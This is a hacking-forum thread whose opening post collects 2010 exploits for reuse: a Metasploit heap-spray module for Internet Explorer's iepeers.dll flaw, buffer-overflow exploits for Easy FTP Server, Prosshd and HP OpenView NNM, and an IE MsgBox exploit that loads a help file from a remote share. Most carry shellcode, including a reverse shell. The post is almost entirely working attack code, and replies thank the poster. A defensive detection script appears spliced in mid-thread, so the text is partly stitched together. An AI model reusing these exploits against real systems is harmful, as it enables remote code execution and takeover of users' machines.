##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/in...-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::HttpServer::HTML

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Internet Explorer iepeers.dll use-after-free',
            'Description'    => %q{
                This module exploits a use-after-free vulnerability within iepeers.dll of
                Microsoft Internet Explorer versions 6 and 7.

                Note: Internet Explorer 8 and Internet Explorer 5 are not affected.
            },
            'License'        => MSF_LICENSE,
            'Author'         => [
                'Trancer <mtrancer[at]gmail.com>'
            ],
            'Version'        => '$Revision$',
            'References'     =>
                [
                    [ 'CVE', '2010-0806' ],
                    [ 'OSVDB', '62810' ],
                    [ 'BID', '38615' ],
                    [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
                    [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC'             => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
                {
                    'Space'           => 1024,
                    'BadChars'        => "\x00\x09\x0a\x0d'\\",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0c0c0c0c } ]
                ],
            'DisclosureDate' => 'Mar 09 2010',
            'DefaultTarget'  => 0))
    end

    def on_request_uri(cli, request)

        # Re-generate the payload
        return if ((p = regenerate_payload(cli)) == nil)

        # Encode the shellcode
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

        # Set the return/nops (32-bit little-endian address, hence 'V')
        ret = Rex::Text.to_unescape([target.ret].pack('V'))

        # Randomize the javascript variable names
        j_shellcode  = rand_text_alpha(rand(100) + 1)
        j_nops       = rand_text_alpha(rand(100) + 1)
        j_slackspace = rand_text_alpha(rand(100) + 1)
        j_fillblock  = rand_text_alpha(rand(100) + 1)
        j_memory     = rand_text_alpha(rand(100) + 1)
        j_counter    = rand_text_alpha(rand(30) + 2)
        j_ret        = rand_text_alpha(rand(100) + 1)
        j_array      = rand_text_alpha(rand(100) + 1)
        j_function1  = rand_text_alpha(rand(100) + 1)
        j_function2  = rand_text_alpha(rand(100) + 1)
        j_object     = rand_text_alpha(rand(100) + 1)
        j_id         = rand_text_alpha(rand(100) + 1)

        # Build out the message (%Q, not %q, so the #{} interpolations are expanded)
        html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
    var #{j_shellcode} = unescape('#{shellcode}');
    #{j_memory} = new Array();
    var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
    var #{j_nops} = unescape('#{ret}');
    while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
    var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
    delete #{j_nops};
    for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
        #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
    }
}
function #{j_function2}(){
    #{j_function1}();
    var #{j_object} = document.createElement('body');
    #{j_object}.addBehavior('#default#userData');
    document.appendChild(#{j_object});
    try {
        for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
            #{j_object}.setAttribute('s',window);
        }
    } catch(e){ }
    window.status+='';
}

document.getElementById('#{j_id}').onclick();
</script></body></html>|

        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

        # Transmit the compressed response to the client
        send_response(cli, html, { 'Content-Type' => 'text/html' })

        # Handle the payload
        handler(cli)

    end

end


# title: SAP GUI version 7.10 WebViewer3D Active-X JIT-spray exploit
# edb-id: 11661
# cve-id: ()
# osvdb-id: ()
# author: Alexey Sintsov
# published: 2010-03-09
# verified: Yes
# download exploit code
# download n/a

SAP GUI version 7.10 WebViewer3D Active-X JIT-spray exploit
Author: Alexey Sintsov
Homepage: http://www.dsec.ru/

http://www.exploit-db.com/sploits/11661.zip

# title: Easy FTP Server v1.7.0.2 CWD remote BoF - MSF module
# edb-id: 11668
# cve-id: ()
# osvdb-id: ()
# author: Blake
# published: 2010-03-09
# verified: Yes
# download exploit code
# download vulnerable app

# exploit title: Easy~FTP
# date: March 9, 2010
# author: Blake
# version: 1.7.0.2
# tested on: Windows XP SP3
# cve :

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking

    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Easy~FTP Server v1.7.0.2 CWD Command Buffer Overflow',
            'Description'    => %q{
                This module exploits a stack overflow in the CWD verb in Easy~FTP Server.

                You must have valid credentials to trigger this vulnerability.
            },
            'Author'         => 'Blake',
            'License'        => MSF_LICENSE,
            'Version'        => 'Version 1',
            'References'     =>
                [
                    [ 'CVE', ''],
                    [ 'OSVDB', ''],
                    [ 'EDB-ID', '11539'],
                    [ 'URL', 'http://www.exploit-db.com/exploits/11539' ],
                ],
            'Privileged'     => true,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'           => 268,
                    'BadChars'        => "\x00\x20\x0a\x0d\x2f\x5c",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP SP3 English', { 'Ret' => 0x009afd58 } ],
                ],
            'DisclosureDate' => 'February 15, 2010',
            'DefaultTarget'  => 0))
    end

    def exploit
        connect_login

        # NOP padding up to 268 bytes, the payload, then the 4-byte return
        # address in little-endian order ('V'); 272 bytes in total
        sploit  = "\x90" * (268 - payload.encoded.length)
        sploit << payload.encoded
        sploit << [target.ret].pack('V')

        print_status("Trying target #{target.name}...")

        send_cmd( ['CWD', sploit] , false)

        handler
        disconnect
    end

end


# title: Internet Explorer 'winhlp32.exe' 'MsgBox()' remote code execution vulnerability
# edb-id: 11615
# cve-id: ()
# osvdb-id: ()
# author: Maurycy Prodeus
# published: 2010-03-02
# verified: Yes
# download exploit code
# download n/a

Microsoft Internet Explorer is prone to a remote code execution vulnerability.

Source (iSEC Security Research):
http://isec.pl/vulnerabilities10.html

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.

Note: attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.

Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.

===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================

<html>
<script type="text/vbscript">
' helpfile argument of MsgBox points at an attacker-controlled .hlp on a remote share
big = "\\184.73.14.110\public\test.hlp"

' optional padding loop, left disabled (VBScript comments use an apostrophe)
'for i=1 to 2500
'    big = big & "\..\"
'next

MsgBox "please press F1 to save the world", , "please save the world", big, 1
MsgBox "press F1 to close this annoying popup", , "", big, 1
MsgBox "press F1 to close this annoying popup", , "", big, 1
</script>
</html>

# title: Prosshd v1.2 20090726 buffer overflow exploit
# edb-id: 11618
# cve-id: ()
# osvdb-id: ()
# author: S2 crew
# published: 2010-03-02
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# author: S2 crew [hungary]

# tested on: Windows xp sp2
 en

# cve: -



# registers:

# eax 000003e4

# ecx 0012ed44

# edx 7c90eb94 ntdll.kifastsystemcallret

# ebx 00000674

# esp 0012efc0 ascii "bbbbbbbbbbbbbbbbbb..."

# ebp 0012f3dc ascii "bbbbbbbbbbbbbbbbbb..."

# esi 7c81dd9a kernel32.createpipe

# edi 0012f3d8 ascii "bbbbbbbbbbbbbbbbbbb..."

# eip 77d5b8d6 user32.77d5b8d6



#!/usr/bin/perl



use net::ssh2;



$username = 'test';

$password = 'test';



$host = '172.16.29.133';

$port = 22;


[*] x86/alpha_mixed succeeded with size 692 (iteration=1) reverse_****************l_tcp

$****************l =

"\x89\xe5\xda\xd7\xd9\x75\xf4\x5e\x56\x59\x49\x49\ x49\x49" .

"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\ x37\x51" .

"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\ x51\x32" .

"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\ x38\x41" .

"\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4e\x69\x45\x50\ x47\x70" .

"\x43\x30\x51\x70\x4f\x79\x4b\x55\x44\x71\x4e\x32\ x51\x74" .

"\x4e\x6b\x43\x62\x44\x70\x4e\x6b\x46\x32\x46\x6c\ x4e\x6b" .

"\x51\x42\x45\x44\x4c\x4b\x50\x72\x51\x38\x46\x6f\ x4f\x47" .

"\x51\x5a\x51\x36\x50\x31\x4b\x4f\x45\x61\x4b\x70\ x4e\x4c" .

"\x47\x4c\x51\x71\x43\x4c\x47\x72\x46\x4c\x47\x50\ x4a\x61" .

"\x48\x4f\x46\x6d\x45\x51\x4f\x37\x4d\x32\x4c\x30\ x51\x42" .

"\x51\x47\x4e\x6b\x51\x42\x44\x50\x4c\x4b\x50\x42\ x47\x4c" .

"\x43\x31\x48\x50\x4e\x6b\x43\x70\x51\x68\x4e\x65\ x49\x50" .

"\x48\x55\x47\x7a\x41\x41";



# jmp esp 0x77dc7c7b user32.dll

# 490-byte pad, saved return address (the jmp esp above), NOP sled, then the payload string
$fuzz = "\x41"x490 . "\x7b\x7c\xdc\x77" . "\x90"x1000 . $****************l;

$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nerror: Connection refused!\n";
$ssh2->auth_password($username, $password) || die "\nerror: Username/password denied!\n";
$scpget = $ssh2->scp_get($fuzz);   # the oversized path is passed to the server's scp handler
$ssh2->disconnect();


# title: Easy ftp server v1.7.0.2 cwd remote bof
# edb-id: 11539
# cve-id: ()
# osvdb-id: ()
# author: Athleet
# published: 2010-02-22
# verified: Yes

#!/usr/bin/python
# tested on: XP SP3 (eng)

import socket, sys

print """
*************************************************
* easy ftp server 1.7.0.2 remote bof            *
* discovered by: Athleet                        *
* jonbutler88[at]googlemail[dot]com             *
*************************************************
"""

if len(sys.argv) != 3:
    print "usage: ./easyftp.py <target ip> <port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# calc.exe poc shellcode - tested on xp pro sp3 (eng)
#
# b *0x009afe44
#
# (the identifier below was masked by the forum's word filter in the original listing)
shellcode = (
"\xba\x20\xf0\xfd\x7f"      # mov edx,7ffdf020
"\xc7\x02\x4c\xaa\xf8\x77"  # mov dword ptr ds:[edx],77f8aa4c
"\x33\xc0"                  # xor eax,eax
"\x50"                      # push eax
"\x68\x63\x61\x6c\x63"      # push 636c6163
"\x54"                      # push esp
"\x5b"                      # pop ebx
"\x50"                      # push eax
"\x53"                      # push ebx
"\xb9\xc7\x93\xc2\x77"      # mov ecx,77c293c7
"\xff\xd1"                  # call ecx
"\xeb\xf7"                  # jmp short 009afe5b
)

nopsled = "\x90" * (268 - len(shellcode))
ret = "\x58\xfd\x9a\x00"
payload = nopsled + shellcode + ret  # 272 bytes

print "[+] launching exploit against " + target + "..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print "[+] connected!"
except:
    print "[!] connection failed!"
    sys.exit(0)

s.recv(1024)
s.send('user anonymous\r\n')
s.recv(1024)
s.send('pass anonymous\r\n')
s.recv(1024)

# send payload...
print "[+] sending payload..."
s.send('cwd ' + payload + '\r\n')
try:
    s.recv(1024)
    print "[!] exploit failed..."
except:
    print "[+] exploited ^_^"

# title: Hp openview nnm ov************help.exe cgi topic overflow
# edb-id: 11974
# cve-id: ()
# osvdb-id: ()
# author: S2 crew
# published: 2010-03-30
# verified: No

#!/usr/bin/python

# exploit title: Hp openview nnm ov************help.exe cgi topic overflow
# date: 2010.03.30
# software link: http://hp.com
# version: 7.53
# tested on: Windows 2003 sp2
# cve: 2009-4178
# code:
############################################
# trying 172.16.29.130...
# connected to 172.16.29.130.
# escape character is '^]'.
# microsoft windows [version 5.2.3790]
# (c) copyright 1985-2003 microsoft corp.
#
# c:\program files\hp openview\www\cgi-bin>
############################################

import struct
import socket
import httplib
import urllib

#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)

sc =(

"\x50\x42\x73\x49\x6f\x4a\x75\x46\x6a\x41\x41" )



data = "a" * 57
data2 = "b" * 5000
ret = "\xdf\xf2\xe5\x77" + "\x90" * 254 + sc   # call esp kernel32.dll
payload = data + ret

p = urllib.urlencode({'topic': payload, 'target': data2})
h = {"Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html",
     "User-Agent": "backtrack", "Accept-Language": "en"}

c = httplib.HTTPConnection('172.16.29.130')
c.request("POST", "/ovcgi/ov************help.exe", p, h)
r = c.getresponse()

print r.status, r.reason
c.close()

print "\ndone\n"
Miscellaneous vulnerabilities, all from 2010. If you find something useful, take it; if not, no criticism please. Best regards.
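A defensive counterpart to the two overflow listings above (the Easy FTP CWD payload and the HP OpenView NNM CGI POST), added here as example code that is not from the original post or from either exploit author. It parses an FTP control-channel line and a urlencoded POST body and flags oversized arguments and NOP-sled padding; the length bounds, the b"ADDR"/b"\xcc" stand-ins and the sample requests are all assumptions constructed for the example.

```python
import re
from urllib.parse import urlencode, unquote_to_bytes

# Added defensive example (not from the original post): flags the request
# shapes the posted exploits rely on, an oversized FTP CWD argument and an
# oversized CGI form field, both padded with an x86 NOP sled.
MAX_FTP_ARG = 255        # assumed sane bound for a path argument
MAX_FORM_FIELD = 1024    # assumed sane bound for a help-topic/target field
NOP_SLED = re.compile(rb"\x90{16,}")   # 16 or more consecutive x86 NOPs

def inspect_value(source, name, value, max_len):
    """Return a list of textual findings for one argument value (bytes)."""
    findings = []
    if len(value) > max_len:
        findings.append("%s %s: length %d > %d" % (source, name, len(value), max_len))
    if NOP_SLED.search(value):
        findings.append("%s %s: NOP sled present" % (source, name))
    nonprint = sum(1 for b in value if b < 0x20 or b > 0x7e)
    if nonprint and nonprint * 4 >= len(value):   # 25% or more non-printable
        findings.append("%s %s: %d non-printable bytes" % (source, name, nonprint))
    return findings

def inspect_ftp_command(line):
    """Inspect one FTP control-channel line such as b'CWD /pub\\r\\n'."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    return inspect_value("ftp", verb.decode("ascii", "replace").upper(), arg, MAX_FTP_ARG)

def inspect_form_body(body):
    """Inspect every field of an application/x-www-form-urlencoded body (bytes)."""
    findings = []
    for pair in body.split(b"&"):
        raw_name, _, raw_value = pair.partition(b"=")
        name = unquote_to_bytes(raw_name).decode("ascii", "replace")
        value = unquote_to_bytes(raw_value.replace(b"+", b" "))
        findings += inspect_value("cgi", name, value, MAX_FORM_FIELD)
    return findings

# Constructed samples. BAD_CWD mirrors the posted 272-byte layout (NOP sled,
# payload, 4-byte address); b"\xcc" filler stands in for the payload and
# b"ADDR" for the address, so neither sample does anything when delivered.
BENIGN_CWD = b"CWD /pub/docs\r\n"
BAD_CWD = b"CWD " + b"\x90" * 200 + b"\xcc" * 68 + b"ADDR" + b"\r\n"
BAD_FORM = urlencode({"topic": b"a" * 57 + b"ADDR" + b"\x90" * 254,
                      "target": b"b" * 5000}).encode("ascii")

if __name__ == "__main__":
    for sample in (BENIGN_CWD, BAD_CWD):
        print(inspect_ftp_command(sample) or ["ftp CWD: ok"])
    print(inspect_form_body(BAD_FORM))
```

The same length check belongs in the server itself, before the argument is copied into a fixed-size buffer; on the wire, these three conditions are what a signature for either listing would key on.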
#4
X-LiiN3
Re: Miscellaneous vulnerabilities, old, added on 22-Apr-2010, 01:22 AM by WEB

May God give you strength, dear friend.

#5
HaCkEr-By-MaROcO
Re: Miscellaneous vulnerabilities, old, added on 22-Apr-2010, 01:45 AM by WEB

God give you strength.
But it would be better if you uploaded them.

****************
Rated.

#6
DANGER M@N
Re: Miscellaneous vulnerabilities, old, added on 22-Apr-2010, 02:03 AM by WEB

Masha'Allah.

I didn't think there were threads this long until I saw yours.

May God help you.

Waiting for more.

#7
شـgقـgلآطه
Re: Miscellaneous vulnerabilities, old, added on 22-Apr-2010, 07:18 AM by WEB

God give you strength.

I'll leave it for others to benefit from.

#8
حلمي أكون هكر
Re: Miscellaneous vulnerabilities, old, added on 22-Apr-2010, 08:24 AM by WEB

God give you strength, nice effort.

#9
ديـہـونجـہـي الـہـًزرقـہـًآء
Re: Miscellaneous vulnerabilities, old, added on 22-Apr-2010, 12:46 PM by WEB

Don't deprive us of your new stuff, you beast.
